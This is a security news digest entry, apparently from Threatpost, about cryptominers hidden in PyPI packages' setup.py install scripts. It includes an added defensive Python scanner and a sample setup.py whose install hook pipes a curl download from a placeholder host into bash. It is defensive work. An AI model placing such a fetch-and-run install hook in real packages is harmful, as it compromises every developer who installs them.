
Cryptominers Slither into Python Projects in Supply-Chain Campaign
2021-06-22 19:27

Cryptomining malware was found to have infiltrated the Python Package Index (PyPI), the repository for software packages written in the Python programming language.

It offers a place where coders can upload software packages for use by developers in building various applications, services and other projects.

A single malicious package can be baked into many different projects, infecting them with cryptominers, info-stealers and more, and making remediation a complex process.

In all of the packages, the malicious code is contained in the build script that runs during a package's installation, setup.py. This file downloads and runs a Bash script from GitHub.
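As an added illustration, not code from the Threatpost article or from the affected packages: a small static triage check that parses a setup.py and flags the install-time behaviour described above (shell or network calls, and a cmdclass override that hooks the install step). The sample setup.py, its URL and the heuristics are constructed for this example.

```python
import ast

# Static triage of a setup.py for the install-time behaviour described above:
# pip runs this script during installation, so code that fetches or executes
# external content there deserves a look. Heuristics are my own (hypothetical).
SUSPICIOUS_DOTTED = {
    "os.system", "os.popen", "subprocess.run", "subprocess.call",
    "subprocess.Popen", "subprocess.check_output", "subprocess.check_call",
    "urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get",
    "exec", "eval",
}
# Bare names that can arrive via "from subprocess import Popen" and the like.
SUSPICIOUS_BARE = {"Popen", "check_output", "check_call", "urlopen", "urlretrieve"}

def _dotted_name(node):
    """Flatten an Attribute chain such as urllib.request.urlopen into a string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def scan_setup_py(source):
    """Return sorted (lineno, finding) pairs for install-time red flags."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name in SUSPICIOUS_DOTTED or name in SUSPICIOUS_BARE:
            findings.append((node.lineno, f"call to {name}"))
        # cmdclass= swaps setuptools' install/develop commands for the package's
        # own class, which is how a run-on-install hook gets wired up.
        if name == "setup" and any(k.arg == "cmdclass" for k in node.keywords):
            findings.append((node.lineno, "setup() overrides cmdclass"))
    return sorted(findings)

# Constructed sample in the shape the article describes (placeholder URL).
SAMPLE = '''from setuptools import setup
from setuptools.command.install import install
import os
class PostInstall(install):
    def run(self):
        install.run(self)
        os.system("curl -s https://example.invalid/x.sh | bash")
setup(name="demo", version="0.1", cmdclass={"install": PostInstall})
'''
```

Running `scan_setup_py(SAMPLE)` reports the os.system call on line 7 and the cmdclass override on line 8; a clean setup.py that only calls setup() with metadata yields no findings.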

The packages weaponized an earlier proof-of-concept dependency-confusion exploit devised by security researcher Alex Birsan to inject rogue code into developer projects.

RubyGems, the open-source package repository and manager for the Ruby programming language, took two of its software packages offline after they were found to be laced with Bitcoin-stealing malware.


News URL

https://threatpost.com/cryptominers-python-supply-chain/167135/

Related vendor

VENDOR LAST 12M #/PRODUCTS LOW MEDIUM HIGH CRITICAL TOTAL VULNS
Python 24 2 52 74 31 159